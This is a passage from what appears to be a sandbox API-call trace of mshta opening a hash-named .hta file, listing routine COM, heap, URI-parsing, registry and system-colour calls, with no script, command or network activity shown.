[0050.077] IUnknown:AddRef (This=0x435f98) returned 0x28 [0050.077] IUnknown:QueryInterface (in: This=0x435f98, riid=0x7fefdbfe970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x30f4e0 | out: ppvObject=0x30f4e0*=0x435fa0) returned 0x0 [0050.077] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefdc017f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x43c0f8 | out: ppvObject=0x43c0f8*=0x0) returned 0x80004002 [0050.077] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefdc018b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x43c0f0 | out: ppvObject=0x43c0f0*=0x0) returned 0x80004002 [0050.077] IServiceProvider:QueryService (in: This=0x435fa0, guidService=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefdbfe0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x43c0e8 | out: ppvObject=0x43c0e8*=0x7fef0002708) returned 0x0 [0050.077] IUnknown:Release (This=0x435fa0) returned 0x0 [0050.077] CoTaskMemAlloc (cb=0x6d) returned 0x414380 [0050.077] CoTaskMemAlloc (cb=0x9) returned 0x420c50 [0050.078] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc) returned 0x420c70 [0050.079] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x88) returned 0x445690 [0050.081] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x78) returned 0x414400 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc) returned 0x420c90 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e670 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x8) returned 0x42d6f0 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x42f340 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x420cb0 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x128) returned 0x449970 [0050.081] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x58) returned 0x449aa0 [0050.082] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xb0) returned 0x449b00 [0050.085] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x160) returned 0x449bc0 [0050.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd10) returned 0x449d30 [0050.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e6a0 [0050.086] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0050.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e6d0 [0050.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xe8) returned 0x40ad00 [0050.086] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x800) returned 0x44aa50 [0050.087] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x800) returned 0x44b260 [0050.087] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x445720 [0050.090] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x800) returned 0x44ba70 [0050.091] IsCharSpaceW (wch=0x48) returned 0 [0050.091] IsCharAlphaNumericW (ch=0x5c) returned 0 [0050.091] IsCharSpaceW (wch=0x5c) returned 0 [0050.091] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x28) returned 0x42e700 [0050.091] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x44c2b0 [0050.096] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x28) returned 0x42e730 [0050.096] IsCharSpaceW (wch=0x41) returned 0 [0050.096] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc) returned 0x420cd0 [0050.096] IsCharAlphaNumericW (ch=0x20) returned 0 [0050.096] IsCharSpaceW (wch=0x20) returned 1 [0050.096] IsCharSpaceW (wch=0x7b) returned 0 [0050.096] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x42e760 [0050.098] IsCharSpaceW (wch=0x20) returned 1 [0050.098] IsCharAlphaNumericW (ch=0x7b) returned 0 [0050.098] IsCharSpaceW (wch=0x62) returned 0 [0050.098] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c2b0 | out: hHeap=0x3f0000) returned 1 [0050.099] IsCharAlphaNumericW (ch=0x3a) returned 0 [0050.099] IsCharSpaceW (wch=0x3a) returned 0 [0050.099] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x28) returned 0x42e790 [0050.108] IsCharAlphaNumericW (ch=0x3a) returned 0 [0050.109] IsCharSpaceW (wch=0x75) returned 0 [0050.109] IsCharAlphaNumericW (ch=0x28) returned 0 [0050.109] IsCharSpaceW (wch=0x28) returned 0 [0050.109] IsCharAlphaNumericW (ch=0x28) returned 0 [0050.109] IsCharSpaceW (wch=0x23) returned 0 [0050.109] IsCharSpaceW (wch=0x23) returned 0 [0050.109] IsCharSpaceW (wch=0x7d) returned 0 [0050.109] IsCharAlphaNumericW (ch=0x7d) returned 0 [0050.109] IsCharSpaceW (wch=0x29) returned 0 [0050.109] IsCharSpaceW (wch=0x75) returned 0 [0050.109] IsCharSpaceW (wch=0x75) returned 0 [0050.109] IsCharSpaceW (wch=0x29) returned 0 [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x42e7c0 [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x34) returned 0x42f3c0 [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4457b0 [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44d6c0 [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44d6f0 [0050.109] CoTaskMemFree (pv=0x414380) [0050.109] CoTaskMemFree (pv=0x420c50) [0050.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x28) returned 0x44d720 [0050.110] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7feff1e0000 [0050.110] GetProcAddress (hModule=0x7feff1e0000, lpProcName=0x6) returned 0x7feff1e1320 [0050.110] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0050.110] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x368) returned 0x44de90 [0050.110] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4a) returned 0x44c2b0 [0050.110] IsOS (dwOS=0x25) returned 1 [0050.110] GetSysColor (nIndex=26) returned 0xcc6600 [0050.111] IsOS (dwOS=0x25) returned 1 [0050.111] GetSysColor (nIndex=5) returned 0xffffff [0050.111] GetSysColor (nIndex=8) returned 0x0 [0050.111] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0050.111] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44d750 [0050.123] wcstol (in: _String="0,0,255", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*=",0,255") returned 0 [0050.123] wcstol (in: _String="0,255", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*=",255") returned 0 [0050.123] wcstol (in: _String="255", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*="") returned 255 [0050.123] wcstol (in: _String="128,0,128", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*=",0,128") returned 128 [0050.124] wcstol (in: _String="0,128", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*=",128") returned 0 [0050.124] wcstol (in: _String="128", _EndPtr=0x30e030, _Radix=10 | out: _EndPtr=0x30e030*="") returned 128 [0050.128] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0050.128] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0050.129] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f138 | out: phkResult=0x30f138*=0x188) returned 0x0 [0050.129] SHGetValueW (in: hkey=0x188, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x30f140, pcbData=0x30f130*=0xa | out: pdwType=0x0, pvData=0x30f140, pcbData=0x30f130*=0xa) returned 0x2 [0050.129] RegCloseKey (hKey=0x188) returned 0x0 [0050.132] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x100) returned 0x44e200 [0050.132] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420d30 [0050.132] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3a) returned 0x418ba0 [0050.132] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9a) returned 0x44e310 [0050.133] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420730 [0050.133] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x26) returned 0x44d780 [0050.134] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9e) returned 0x44e3c0 [0050.134] GetProcessHeap () returned 0x3f0000 [0050.134] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f400 | out: hHeap=0x3f0000) returned 1 [0050.134] GetProcessHeap () returned 0x3f0000 [0050.134] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42f440 | out: hHeap=0x3f0000) returned 1 [0050.134] GetProcessHeap () returned 0x3f0000 [0050.134] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420710 | out: hHeap=0x3f0000) returned 1 [0050.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x14) returned 0x420c50 [0050.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44d7b0 [0050.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44d7e0 [0050.135] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x445840 [0050.137] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41b220 [0050.137] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x24) returned 0x44d810 [0050.137] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x44d840 [0050.137] GetAcceptLanguagesW () returned 0x0 [0050.138] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x420d50 [0050.138] GetClassNameW (in: hWnd=0x40106, lpClassName=0x30f4b0, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0050.138] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0050.138] GetParent (hWnd=0x40106) returned 0x60020 [0050.138] GetClassNameW (in: hWnd=0x60020, lpClassName=0x30f4b0, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0050.138] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0050.138] GetParent (hWnd=0x60020) returned 0x0 [0050.138] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x44d870 [0050.138] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x418bf0 [0050.138] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d870 | out: hHeap=0x3f0000) returned 1 [0050.138] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x88) returned 0x4458d0 [0050.138] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16) returned 0x420d90 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x128) returned 0x44e470 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1c) returned 0x44d870 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1a) returned 0x44d8a0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1c) returned 0x44d8d0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16) returned 0x420db0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x420dd0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16) returned 0x44e5d0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x44e5f0 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x38) returned 0x42f440 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1a) returned 0x44d900 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1a) returned 0x44d930 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e610 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e630 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e650 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e670 [0050.139] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x44e690 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc) returned 0x44e6d0 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x44e6f0 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e710 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x16) returned 0x44e730 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa) returned 0x44e750 [0050.140] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2e) returned 0x42f400 [0050.140] GetProcessHeap () returned 0x3f0000 [0050.140] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d960 | out: hHeap=0x3f0000) returned 1 [0050.140] GetProcessHeap () returned 0x3f0000 [0050.140] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d990 | out: hHeap=0x3f0000) returned 1 [0050.140] GetProcessHeap () returned 0x3f0000 [0050.140] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d9c0 | out: hHeap=0x3f0000) returned 1 [0050.140] GetProcessHeap () returned 0x3f0000 [0050.140] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420d10 | out: hHeap=0x3f0000) returned 1 [0050.145] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e690 | out: hHeap=0x3f0000) returned 1 [0050.145] IMoniker:GetDisplayName (in: This=0x414180, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x30f5c8 | out: ppszDisplayName=0x30f5c8*="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0050.145] IUnknown:QueryInterface (in: This=0x414180, riid=0x7feefee0578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x30f430 | out: ppvObject=0x30f430*=0x414198) returned 0x0 [0050.146] IUriContainer:GetIUri (in: This=0x414198, ppIUri=0x30f480 | out: ppIUri=0x30f480*=0x42da90) returned 0x0 [0050.146] IUnknown:Release (This=0x414198) returned 0x1 [0050.146] IUnknown:AddRef (This=0x414180) returned 0x2 [0050.146] IUnknown:AddRef (This=0x42da90) returned 0x5 [0050.146] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0050.146] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0050.146] IMoniker:GetDisplayName (in: This=0x414180, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x30f230 | out: ppszDisplayName=0x30f230*="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0050.146] UrlGetLocationW (psz1="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0050.146] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppmk=0x30f1c0*=0x0, dwFlags=0x1 | out: ppmk=0x30f1c0*=0x414380) returned 0x0 [0050.146] CreateUri (in: pwzURI="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x30f1a0 | out: ppURI=0x30f1a0*=0x44ef70) returned 0x0 [0050.147] IUri:GetScheme (in: This=0x44ef70, pdwScheme=0x30f0e0 | out: pdwScheme=0x30f0e0*=0x9) returned 0x0 [0050.147] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0050.147] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0050.147] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x38) returned 0x42f480 [0050.147] IUnknown:AddRef (This=0x44ef70) returned 0x5 [0050.147] IUri:GetAbsoluteUri (in: This=0x44ef70, pbstrAbsoluteUri=0x42f480 | out: pbstrAbsoluteUri=0x42f480*="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0050.147] IUnknown:Release (This=0x44ef70) returned 0x4 [0050.147] IUnknown:AddRef (This=0x414380) returned 0x2 [0050.147] IUnknown:Release (This=0x414380) returned 0x1 [0050.147] IUnknown:AddRef (This=0x414180) returned 0x3 [0050.147] IUnknown:Release (This=0x414380) returned 0x0 [0050.147] IUnknown:AddRef (This=0x414180) returned 0x4 [0050.148] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ee00 | out: ppvObject=0x30ee00*=0x42da90) returned 0x0 [0050.148] IUnknown:Release (This=0x42da90) returned 0x5 [0050.148] IUnknown:AddRef (This=0x42da90) returned 0x6 [0050.148] IUnknown:QueryInterface (in: This=0x414180, riid=0x7feefee0578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x30eda0 | out: ppvObject=0x30eda0*=0x414198) returned 0x0 [0050.148] IUriContainer:GetIUri (in: This=0x414198, ppIUri=0x30ee40 | out: ppIUri=0x30ee40*=0x42da90) returned 0x0 [0050.148] IUnknown:Release (This=0x414198) returned 0x4 [0050.148] IUnknown:AddRef (This=0x414180) returned 0x5 [0050.148] IUnknown:Release (This=0x414180) returned 0x4 [0050.148] IUnknown:AddRef (This=0x42da90) returned 0x8 [0050.148] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ee00 | out: ppvObject=0x30ee00*=0x42da90) returned 0x0 [0050.148] IUnknown:Release (This=0x42da90) returned 0x8 [0050.148] IUnknown:AddRef (This=0x42da90) returned 0x9 [0050.148] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x30ee00 | out: pdwScheme=0x30ee00*=0x9) returned 0x0 [0050.148] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x140) returned 0x44f790 [0050.148] GetCurrentProcessId () returned 0xf10 [0050.148] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ee00 | out: ppvObject=0x30ee00*=0x42da90) returned 0x0 [0050.148] IUnknown:Release (This=0x42da90) returned 0x9 [0050.148] IUnknown:AddRef (This=0x42da90) returned 0xa [0050.150] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x30edd0 | out: pdwScheme=0x30edd0*=0x9) returned 0x0 [0050.151] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ed00 | out: ppvObject=0x30ed00*=0x42da90) returned 0x0 [0050.152] IUnknown:Release (This=0x42da90) returned 0xa [0050.152] IUnknown:AddRef (This=0x42da90) returned 0xb [0050.152] IUnknown:Release (This=0x42da90) returned 0xa [0050.152] IUri:GetAbsoluteUri (in: This=0x42da90, pbstrAbsoluteUri=0x30ede0 | out: pbstrAbsoluteUri=0x30ede0*="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0050.152] GetProcAddress (hModule=0x7feff1e0000, lpProcName=0x7) returned 0x7feff1e1020 [0050.152] SysStringLen (param_1="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x66 [0050.152] CreateUri (in: pwzURI="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x30f1e0 | out: ppURI=0x30f1e0*=0x44f8f0) returned 0x0 [0050.152] IUnknown:Release (This=0x42da90) returned 0x9 [0050.152] IUri:GetScheme (in: This=0x44f8f0, pdwScheme=0x30ed70 | out: pdwScheme=0x30ed70*=0x9) returned 0x0 [0050.152] IUri:IsEqual (in: This=0x44ef70, pUri=0x44f8f0, pfEqual=0x30ee10 | out: pfEqual=0x30ee10*=1) returned 0x0 [0050.153] IUnknown:AddRef (This=0x44ef70) returned 0x3 [0050.153] IUri:GetPropertyDWORD (in: This=0x44ef70, uriProp=0x11, pdwProperty=0x30eb28, dwFlags=0x0 | out: pdwProperty=0x30eb28*=0x9) returned 0x0 [0050.154] IUnknown:Release (This=0x44ef70) returned 0x2 [0050.154] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd2) returned 0x44fe90 [0050.154] IInternetSecurityManager:GetSecurityId (in: This=0x43c0b0, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pbSecurityId=0x30ebe0, pcbSecurityId=0x30ebd0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x30ebe0*=0x66, pcbSecurityId=0x30ebd0*=0x9) returned 0x0 [0052.811] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44fe90 | out: hHeap=0x3f0000) returned 1 [0052.811] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420a70 | out: hHeap=0x3f0000) returned 1 [0052.811] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x420a70 [0052.811] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420b90 | out: hHeap=0x3f0000) returned 1 [0052.811] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x420b90 [0052.811] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30ed70 | out: ppu=0x30ed70) returned 0x0 [0052.812] GetDC (hWnd=0x0) returned 0x1a010b3a [0052.812] CreateCompatibleBitmap (hdc=0x1a010b3a, cx=1, cy=1) returned 0x3050b46 [0052.812] GetDIBits (in: hdc=0x1a010b3a, hbm=0x3050b46, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x30e920, usage=0x0 | out: lpvBits=0x0, lpbmi=0x30e920) returned 1 [0052.812] GetDIBits (in: hdc=0x1a010b3a, hbm=0x3050b46, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x30e920, usage=0x0 | out: lpvBits=0x0, lpbmi=0x30e920) returned 1 [0052.813] DeleteObject (ho=0x3050b46) returned 1 [0052.813] GetSysColor (nIndex=0) returned 0xc8c8c8 [0052.813] GetSysColor (nIndex=1) returned 0x0 [0052.813] GetSysColor (nIndex=2) returned 0xd1b499 [0052.813] GetSysColor (nIndex=3) returned 0xdbcdbf [0052.813] GetSysColor (nIndex=4) returned 0xf0f0f0 [0052.813] GetSysColor (nIndex=5) returned 0xffffff [0052.813] GetSysColor (nIndex=6) returned 0x646464 [0052.813] GetSysColor (nIndex=7) returned 0x0 [0052.813] GetSysColor (nIndex=8) returned 0x0 [0052.813] GetSysColor (nIndex=9) returned 0x0 [0052.813] GetSysColor (nIndex=10) returned 0xb4b4b4 [0052.813] GetSysColor (nIndex=11) returned 0xfcf7f4 [0052.813] GetSysColor (nIndex=12) returned 0xababab [0052.813] GetSysColor (nIndex=13) returned 0xff9933 [0052.813] GetSysColor (nIndex=14) returned 0xffffff [0052.813] GetSysColor (nIndex=15) returned 0xf0f0f0 [0052.813] GetSysColor (nIndex=16) returned 0xa0a0a0 [0052.813] GetSysColor (nIndex=17) returned 0x6d6d6d [0052.813] GetSysColor (nIndex=18) returned 0x0 [0052.813] GetSysColor (nIndex=19) returned 0x544e43 [0052.813] GetSysColor (nIndex=20) returned 0xffffff [0052.813] GetSysColor (nIndex=21) returned 0x696969 [0052.813] GetSysColor (nIndex=22) returned 0xe3e3e3 [0052.813] GetSysColor (nIndex=23) returned 0x0 [0052.813] GetSysColor (nIndex=24) returned 0xe1ffff [0052.813] GetSysColor (nIndex=25) returned 0x0 [0052.813] GetSysColor (nIndex=26) returned 0xcc6600 [0052.813] GetSysColor (nIndex=27) returned 0xead1b9 [0052.813] GetSysColor (nIndex=28) returned 0xf2e4d7 [0052.813] GetSysColor (nIndex=29) returned 0xff9933 [0052.813] GetSysColor (nIndex=30) returned 0xf0f0f0 [0052.813] GetSysColor (nIndex=31) returned 0x0 [0052.814] GetSysColor (nIndex=32) returned 